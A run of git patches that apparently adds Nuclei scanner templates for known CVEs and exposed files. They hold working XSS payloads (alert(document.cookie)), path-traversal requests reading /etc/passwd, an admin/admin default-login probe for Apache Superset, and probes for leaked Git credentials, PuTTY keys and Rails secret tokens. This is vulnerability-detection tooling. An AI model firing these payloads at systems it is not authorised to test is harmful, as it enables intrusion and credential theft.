a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -25,9 +25,8 @@ requests: - type: regex part: body regex: - - '(K|k)ey([U|u]p|[D|d]own|[P|p]ress)' - - '(K|k)eyboard(N|n)avigation' - - '[P|p]assword([E|e]mail[N|n]ot[F|f]ound[M|m]essage|[L|l]abel|[E|e]rror[M|m]essage|[M|m]essage)' + - '(?i)key(up|down|press|boardnavigation)' + - '(?i)password(emailnotfoundmessage|label|errormessage|message)' condition: or negative: true From 1114ebe9e7e72f973a17a1343301dedc7ee8699e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 21 Jul 2021 06:12:19 +0700 Subject: [PATCH 0956/4083] Create CVE-2016-1000137.yaml --- cves/2016/CVE-2016-1000137.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000137.yaml diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml new file mode 100644 index 0000000000..bc2f9e7e7a --- /dev/null +++ b/cves/2016/CVE-2016-1000137.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000137 + +info: + name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 2d098d199e58f2000e8ce5c6e3a3fc53d4db63a5 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 21 Jul 2021 06:14:21 +0700 Subject: [PATCH 0957/4083] Create CVE-2016-1000138.yaml --- cves/2016/CVE-2016-1000138.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000138.yaml diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml new file mode 100644 index 0000000000..37ea234570 --- /dev/null +++ b/cves/2016/CVE-2016-1000138.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000138 + +info: + name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 44b7a54585c928d87122dbdd447c08f4d09f5142 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 21 Jul 2021 06:16:34 +0700 Subject: [PATCH 0958/4083] Create CVE-2016-1000140.yaml --- cves/2016/CVE-2016-1000140.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000140.yaml diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml new file mode 100644 index 0000000000..c44f2dd638 --- /dev/null +++ b/cves/2016/CVE-2016-1000140.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000140 + +info: + name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From bc3f16232889ebb3eebe2923b9fa90d8b3b2f408 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 21 Jul 2021 08:05:30 +0700 Subject: [PATCH 0959/4083] Create CVE-2014-6308.yaml --- cves/2014/CVE-2014-6308.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2014/CVE-2014-6308.yaml diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml new file mode 100644 index 0000000000..fa7b6414d5 --- /dev/null +++ b/cves/2014/CVE-2014-6308.yaml @@ -0,0 +1,24 @@ +id: CVE-2014-6308 + +info: + name: Osclass Security Advisory 3.4.1 - Local File Inclusion + author: daffainfo + severity: high + reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 8d8f39c26f5947bc10641131a4cfb78bc25fcaeb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 10:40:13 +0530 Subject: [PATCH 0960/4083] Create CVE-2021-32820.yaml --- cves/2021/CVE-2021-32820.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-32820.yaml diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml new file mode 100644 index 0000000000..fd3af8498d --- /dev/null +++ b/cves/2021/CVE-2021-32820.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-32820 + +info: + name: Express-handlebars Path Traversal + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json + tags: cve,cve2021,express,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?layout=/etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "\\s*root:[x*]" + - "\\s*daemon:[x*]" + - "\\s*operator:[x*]:" + part: body From 16750fd9a24568e29f592920d311c88f327f34d5 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Wed, 21 Jul 2021 14:18:00 +0900 Subject: [PATCH 0961/4083] Create magicflow-lfi.yaml Signed-off-by: GwanYeong Kim --- vulnerabilities/other/magicflow-lfi.yaml | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/magicflow-lfi.yaml diff --git a/vulnerabilities/other/magicflow-lfi.yaml b/vulnerabilities/other/magicflow-lfi.yaml new file mode 100644 index 0000000000..9cd36ae32a --- /dev/null +++ b/vulnerabilities/other/magicflow-lfi.yaml @@ -0,0 +1,25 @@ +id: magicflow-lfi + +info: + name: MagicFlow - Local File Inclusion + author: gy741 + severity: critical + reference: https://www.seebug.org/vuldb/ssvid-89258 + tags: magicflow,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd" + - "{{BaseURL}}/msa/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 148554ac78e153179e58d546d449bf5787a1208d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 10:51:27 +0530 Subject: [PATCH 0962/4083] Create apache-superset-default-credentials.yaml --- .../apache-superset-default-credentials.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 default-logins/apache/apache-superset-default-credentials.yaml diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml new file mode 100644 index 0000000000..a09c89feb5 --- /dev/null +++ b/default-logins/apache/apache-superset-default-credentials.yaml @@ -0,0 +1,29 @@ +id: apache-superset-default-credentials + +info: + name: Apache Superset Default Credentials + author: dhiyaneshDK + severity: high + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json + tags: apache, default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/login/" + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + body: 'username=admin&password=admin' + + matchers-condition: and + matchers: + + - type: word + words: + - "Redirecting..." + - "/" + part: body + + - type: status + status: + - 200 From c9852b62dd02f926ae4fd9bfad551a1ffe7bd6dc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 11:02:36 +0530 Subject: [PATCH 0963/4083] Create clockwork-dashboard-exposure.yaml --- .../clockwork-dashboard-exposure.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 misconfiguration/clockwork-dashboard-exposure.yaml diff --git a/misconfiguration/clockwork-dashboard-exposure.yaml b/misconfiguration/clockwork-dashboard-exposure.yaml new file mode 100644 index 0000000000..06d22423a7 --- /dev/null +++ b/misconfiguration/clockwork-dashboard-exposure.yaml @@ -0,0 +1,27 @@ +id: clockwork-dashboard-exposure + +info: + name: Clockwork Dashboard Exposure + author: dhiyaneshDk + severity: high + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json + tags: exposure,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/__clockwork/latest" + matchers-condition: and + matchers: + - type: word + words: + - "\"id\"" + - "\"version\"" + - "\"method\"" + - "\"url\"" + - "\"time\"" + part: body + - type: word + words: + - "application/json" + part: header From 4f5a9f7d94bd845d96d6afacc32c3906a3233411 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 11:09:04 +0530 Subject: [PATCH 0964/4083] Create appsec-yml-disclosure.yaml --- exposures/configs/appsec-yml-disclosure.yaml | 33 ++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposures/configs/appsec-yml-disclosure.yaml diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appsec-yml-disclosure.yaml new file mode 100644 index 0000000000..56ce5522aa --- /dev/null +++ b/exposures/configs/appsec-yml-disclosure.yaml @@ -0,0 +1,33 @@ +id: appsec-yml-disclosure + +info: + name: Appsec Yml Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/appspec.yml" + - "{{BaseURL}}/appspec.yaml" + matchers-condition: and + matchers: + - type: word + words: + - "\"version\"" + - "\"os\"" + - "\"files\"" + - "\"permissions\"" + - "\"hooks\"" + - "\"BeforeInstall\"" + - "\"ApplicationStart\"" + part: body + - type: word + words: + - "application/yaml" + part: header + - type: status + status: + - 200 From 01bd0b38f4d1b6198a92969bc5013193c5437ba9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 11:13:50 +0530 Subject: [PATCH 0965/4083] Create dockerfile-hidden-disclosure.yaml --- .../configs/dockerfile-hidden-disclosure.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/configs/dockerfile-hidden-disclosure.yaml diff --git a/exposures/configs/dockerfile-hidden-disclosure.yaml b/exposures/configs/dockerfile-hidden-disclosure.yaml new file mode 100644 index 0000000000..4592139362 --- /dev/null +++ b/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -0,0 +1,23 @@ +id: dockerfile-hidden-disclosure + +info: + name: Dockerfile Hidden Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/.dockerfile" + - "{{BaseURL}}/.Dockerfile" + matchers-condition: and + matchers: + - type: regex + regex: + - '^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\\#)\\s+[ -~]+' + part: body + - type: status + status: + - 200 From 3425a83d38447f5c7581f7cac957935daf20b64b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 11:19:35 +0530 Subject: [PATCH 0966/4083] Create git-credentials-disclosure.yaml --- .../configs/git-credentials-disclosure.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/configs/git-credentials-disclosure.yaml diff --git a/exposures/configs/git-credentials-disclosure.yaml b/exposures/configs/git-credentials-disclosure.yaml new file mode 100644 index 0000000000..7db331dfa9 --- /dev/null +++ b/exposures/configs/git-credentials-disclosure.yaml @@ -0,0 +1,26 @@ +id: git-credentials-disclosure + +info: + name: Git Credentials Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/git-credentials-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/.git-credentials" + matchers-condition: and + matchers: + - type: regex + regex: + - "https?://[\\d\\w\\{\\}\\.%]+(?:|@)[\\d\\w\\{\\}\\.]+:[\\d\\w\\{\\}\\.]+(?:|@)[\\d\\w\\{\\}\\.\\?!~#@]+" + part: body + - type: word + words: + - "Content-Type: text/html" + part: header + - type: status + status: + - 200 From d72b6df0bf828172f513ef5ec215e08a2d0b1bde Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 21 Jul 2021 11:35:30 +0530 Subject: [PATCH 0967/4083] Create CVE-2009-1872.yaml --- cves/2009/CVE-2009-1872.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2009/CVE-2009-1872.yaml diff --git a/cves/2009/CVE-2009-1872.yaml b/cves/2009/CVE-2009-1872.yaml new file mode 100644 index 0000000000..f2d3abffa1 --- /dev/null +++ b/cves/2009/CVE-2009-1872.yaml @@ -0,0 +1,32 @@ +id: CVE-2009-1872 + +info: + name: Adobe Coldfusion 8 linked XSS vulnerabilies + author: princechaddha + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. + reference: | + - https://www.securityfocus.com/archive/1/505803/100/0/threaded + - https://www.tenable.com/cve/CVE-2009-1872 + tags: cve,cve2009,adobe,xss,coldfusion + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?>' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 15a19dea3dcc04716ad1bfd861d44b30961560db Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:21:05 +0530 Subject: [PATCH 0968/4083] Create github-workflows-disclosure.yaml --- .../configs/github-workflows-disclosure.yaml | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 exposures/configs/github-workflows-disclosure.yaml diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml new file mode 100644 index 0000000000..35a0311ed4 --- /dev/null +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -0,0 +1,49 @@ +id: github-workflows-disclosure + +info: + name: Github Workflow Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/git-credentials-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/.github/workflows/ci.yml" + - "{{BaseURL}}/.github/workflows/ci.yaml" + - "{{BaseURL}}/.github/workflows/CI.yml" + - "{{BaseURL}}/.github/workflows/main.yml" + - "{{BaseURL}}/.github/workflows/main.yaml" + - "{{BaseURL}}/.github/workflows/build.yml" + - "{{BaseURL}}/.github/workflows/build.yaml" + - "{{BaseURL}}/.github/workflows/test.yml" + - "{{BaseURL}}/.github/workflows/test.yaml" + - "{{BaseURL}}/.github/workflows/tests.yml" + - "{{BaseURL}}/.github/workflows/tests.yaml" + - "{{BaseURL}}/.github/workflows/release.yml" + - "{{BaseURL}}/.github/workflows/publish.yml" + - "{{BaseURL}}/.github/workflows/deploy.yml" + - "{{BaseURL}}/.github/workflows/push.yml" + - "{{BaseURL}}/.github/workflows/lint.yml" + - "{{BaseURL}}/.github/workflows/coverage.yml" + - "{{BaseURL}}/.github/workflows/release.yaml" + - "{{BaseURL}}/.github/workflows/pr.yml" + - "{{BaseURL}}/.github/workflows/automerge.yml" + - "{{BaseURL}}/.github/workflows/docker.yml" + matchers-condition: and + matchers: + - type: regex + regex: + - "(?m)^\\s*\"?on\"?:" + - "(?m)^\\s*\"?jobs\"?:" + - "(?m)^\\s*\"?steps\"?:" + - "(?m)^\\s*- \"?uses\"?:" + part: body + - type: word + words: + - "Content-Type: text/html" + part: header + - type: status + status: + - 200 From bf4d51136aac66be89da10c06bdb7ac4d30d2764 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:29:52 +0530 Subject: [PATCH 0969/4083] Create hp-ilo-serial-key-disclosure.yaml --- .../configs/hp-ilo-serial-key-disclosure.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposures/configs/hp-ilo-serial-key-disclosure.yaml diff --git a/exposures/configs/hp-ilo-serial-key-disclosure.yaml b/exposures/configs/hp-ilo-serial-key-disclosure.yaml new file mode 100644 index 0000000000..8ae8ec05f2 --- /dev/null +++ b/exposures/configs/hp-ilo-serial-key-disclosure.yaml @@ -0,0 +1,28 @@ +id: hp-ilo-serial-key-disclosure + +info: + name: HP ILO Serial Key Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/xmldata?item=CpqKey" + matchers-condition: and + matchers: + - type: word + words: + - "LTYPE" + - "LNAME" + - "KEY" + part: body + - type: word + words: + - "Content-Type: text/html" + part: header + - type: status + status: + - 200 From 6e76e533c8c46a4aee7d593fef6a406e41c61045 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:36:59 +0530 Subject: [PATCH 0970/4083] Create kubernetes-kustomization-disclosure.yaml --- .../kubernetes-kustomization-disclosure.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposures/configs/kubernetes-kustomization-disclosure.yaml diff --git a/exposures/configs/kubernetes-kustomization-disclosure.yaml b/exposures/configs/kubernetes-kustomization-disclosure.yaml new file mode 100644 index 0000000000..7f47155de0 --- /dev/null +++ b/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -0,0 +1,30 @@ +id: kubernetes-kustomization-disclosure + +info: + name: Kubernetes Kustomization Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/kubernetes-kustomization-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/kustomization.yml" + matchers-condition: and + matchers: + - type: word + words: + - "(?m)^\\s*apiVersion\\s*:\\s*kustomize\\.config" + - "(?mi)^\\s*kind\\s*:\\s*Kustomization" + - "(?m)^\\scommonLabels\\s*:" + - "(?m)^\\sresources\\s*:" + - "(?m)^\\snamespace\\s*:" + part: body + - type: word + words: + - "Content-Type: application/yaml" + part: header + - type: status + status: + - 200 From 419456f27718a3c5bc18a5bf64ef10e2926b2d23 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:39:36 +0530 Subject: [PATCH 0971/4083] Update kubernetes-kustomization-disclosure.yaml --- exposures/configs/kubernetes-kustomization-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/kubernetes-kustomization-disclosure.yaml b/exposures/configs/kubernetes-kustomization-disclosure.yaml index 7f47155de0..6a40cf7714 100644 --- a/exposures/configs/kubernetes-kustomization-disclosure.yaml +++ b/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -13,8 +13,8 @@ requests: - "{{BaseURL}}/kustomization.yml" matchers-condition: and matchers: - - type: word - words: + - type: regex + regex: - "(?m)^\\s*apiVersion\\s*:\\s*kustomize\\.config" - "(?mi)^\\s*kind\\s*:\\s*Kustomization" - "(?m)^\\scommonLabels\\s*:" From 08f160f0e2fb1d8f970a681623290d56f2eb4fba Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:46:40 +0530 Subject: [PATCH 0972/4083] Create nginx-merge-slashes-path-traversal.yaml --- .../nginx-merge-slashes-path-traversal.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml new file mode 100644 index 0000000000..31c1ab53cf --- /dev/null +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -0,0 +1,25 @@ +id: nginx-merge-slashes-path-traversal + +info: + name: Nginx Merge Slashes Path Traversal + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}//////../../../etc/passwd" + - "{{BaseURL}}/static//////../../../../etc/passwd" + - "{{BaseURL}}///../app.js" + matchers-condition: and + matchers: + - type: word + words: + - "root:" + - "app.listen" + part: body + - type: status + status: + - 200 From f20c444b4ed9176002e6eff137e89f8ffd05e353 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:49:50 +0530 Subject: [PATCH 0973/4083] Create php-user-ini-disclosure.yaml --- exposures/files/php-user-ini-disclosure.yaml | 28 ++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposures/files/php-user-ini-disclosure.yaml diff --git a/exposures/files/php-user-ini-disclosure.yaml b/exposures/files/php-user-ini-disclosure.yaml new file mode 100644 index 0000000000..a91e64af52 --- /dev/null +++ b/exposures/files/php-user-ini-disclosure.yaml @@ -0,0 +1,28 @@ +id: php-user-ini-disclosure + +info: + name: Php User.ini Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/php-user-ini-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/user.ini" + - "{{BaseURL}}/.user.ini" + matchers-condition: and + matchers: + - type: word + words: + - "assert" + - "highlight" + - "opcache" + - "mssql" + - "oci8" + - "agent" + part: body + - type: status + status: + - 200 From 4d53c1f2a547c8d3890d26122b37f4f05745cc8f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:53:55 +0530 Subject: [PATCH 0974/4083] Create putty-private-key-disclosure.yaml --- .../files/putty-private-key-disclosure.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/files/putty-private-key-disclosure.yaml diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml new file mode 100644 index 0000000000..7c6cb29f79 --- /dev/null +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -0,0 +1,23 @@ +id: putty-private-key-disclosure + +info: + name: Putty Private Key Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/my.ppk" + matchers-condition: and + matchers: + - type: word + words: + - "PuTTY-User-Key-File" + - "Encryption:" + part: body + - type: status + status: + - 200 From 6bfc2709171ff75e860a44f25c51f4952edb8e92 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:54:09 +0530 Subject: [PATCH 0975/4083] Update php-user-ini-disclosure.yaml --- exposures/files/php-user-ini-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/php-user-ini-disclosure.yaml b/exposures/files/php-user-ini-disclosure.yaml index a91e64af52..d2982cbc34 100644 --- a/exposures/files/php-user-ini-disclosure.yaml +++ b/exposures/files/php-user-ini-disclosure.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: medium reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/php-user-ini-disclosure.json - tags: exposure,config + tags: exposure,files requests: - method: GET From f66e7676a62992874efe9a5df0418275794fd11e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 13:57:17 +0530 Subject: [PATCH 0976/4083] Create pyproject-disclosure.yaml --- exposures/files/pyproject-disclosure.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/files/pyproject-disclosure.yaml diff --git a/exposures/files/pyproject-disclosure.yaml b/exposures/files/pyproject-disclosure.yaml new file mode 100644 index 0000000000..11223e694f --- /dev/null +++ b/exposures/files/pyproject-disclosure.yaml @@ -0,0 +1,23 @@ +id: pyproject-disclosure + +info: + name: Pyproject Disclosure + author: dhiyaneshDk + severity: low + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/pyproject-disclosure.json + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/pyproject.toml" + matchers-condition: and + matchers: + - type: word + words: + - "[build-system]" + - "[tool.poetry]" + part: body + - type: status + status: + - 200 From 929250a6afa3ba5c1ad4f3520163a370913e7cfa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 14:01:09 +0530 Subject: [PATCH 0977/4083] Create roundcube-log-disclosure.yaml --- exposures/logs/roundcube-log-disclosure.yaml | 23 ++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/logs/roundcube-log-disclosure.yaml diff --git a/exposures/logs/roundcube-log-disclosure.yaml b/exposures/logs/roundcube-log-disclosure.yaml new file mode 100644 index 0000000000..63d017a187 --- /dev/null +++ b/exposures/logs/roundcube-log-disclosure.yaml @@ -0,0 +1,23 @@ +id: roundcube-log-disclosure + +info: + name: Roundcube Log Disclosure + author: dhiyaneshDk + severity: low + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json + tags: exposure,logs + +requests: + - method: GET + path: + - "{{BaseURL}}/roundcube/logs/sendmail" + - "{{BaseURL}}/roundcube/logs/errors.log" + matchers-condition: and + matchers: + - type: word + words: + - "IMAP Error:" + part: body + - type: status + status: + - 200 From 733e98f1e241e7ad73ba6398bd0e73208c79b87b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 14:03:20 +0530 Subject: [PATCH 0978/4083] Create ruby-on-rails-secret-token-disclosure.yaml --- ...ruby-on-rails-secret-token-disclosure.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/files/ruby-on-rails-secret-token-disclosure.yaml diff --git a/exposures/files/ruby-on-rails-secret-token-disclosure.yaml b/exposures/files/ruby-on-rails-secret-token-disclosure.yaml new file mode 100644 index 0000000000..8748d50051 --- /dev/null +++ b/exposures/files/ruby-on-rails-secret-token-disclosure.yaml @@ -0,0 +1,23 @@ +id: ruby-on-rails-secret-token-disclosure + +info: + name: Ruby on Rails Secret Token Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/config/initializers/secret_token.rb" + matchers-condition: and + matchers: + - type: word + words: + - "secret_key_base =" + - "config.secret_token =" + part: body + - type: status + status: + - 200 From 5200f16d4d31a0674af1b35e2f60372672b2b5c7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 21 Jul 2021 14:05:40 +0530 Subject: [PATCH 0979/4083] Create snyk-ignore-file-disclosure.yaml --- .../files/snyk-ignore-file-disclosure.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposures/files/snyk-ignore-file-disclosure.yaml diff --git a/exposures/files/snyk-ignore-file-disclosure.yaml b/exposures/files/snyk-ignore-file-disclosure.yaml new file mode 100644 index 0000000000..e050af3142 --- /dev/null +++ b/exposures/files/snyk-ignore-file-disclosure.yaml @@ -0,0 +1,22 @@ +id: snyk-ignore-file-disclosure + +info: + name: Snyk Ignore File Disclosure + author: dhiyaneshDk + severity: low + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/snyk-ignore-file-disclosure.json + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/.snyk" + matchers-condition: and + matchers: + - type: word + words: + - '# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.' + part: body + - type: status + status: + - 200 From 59693f29e5e045764c993966e92fad0b0cb5793c Mon Sep 17 